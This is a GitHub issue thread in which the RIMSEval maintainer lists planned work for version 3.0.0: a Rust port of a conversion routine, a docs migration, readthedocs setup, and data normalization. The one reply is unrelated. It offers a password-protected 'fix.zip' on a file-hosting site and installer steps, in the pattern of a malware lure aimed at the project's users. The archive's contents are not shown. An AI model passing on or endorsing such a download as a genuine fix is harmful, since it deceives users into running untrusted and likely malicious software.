### ISSUE TITLE
Todo list for `v3.0.0`

### ISSUE THREAD

**Issue by trappitsch** [RIMS-Code/RIMSEval#111]
Here's a todo list for `v3.0.0`. Some improvements are required:

- [ ] Change `lst2crd` conversion from python to rust
- [ ] Update docs and move them to `mkdocs`
- [ ] Re-enable readthedocs to pull from `main` branch and create docs on PRs
- [ ] Add possibility to normalize the data in package and GUI

More might come, this is a temporary list for now.

**Comment by rodeok** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
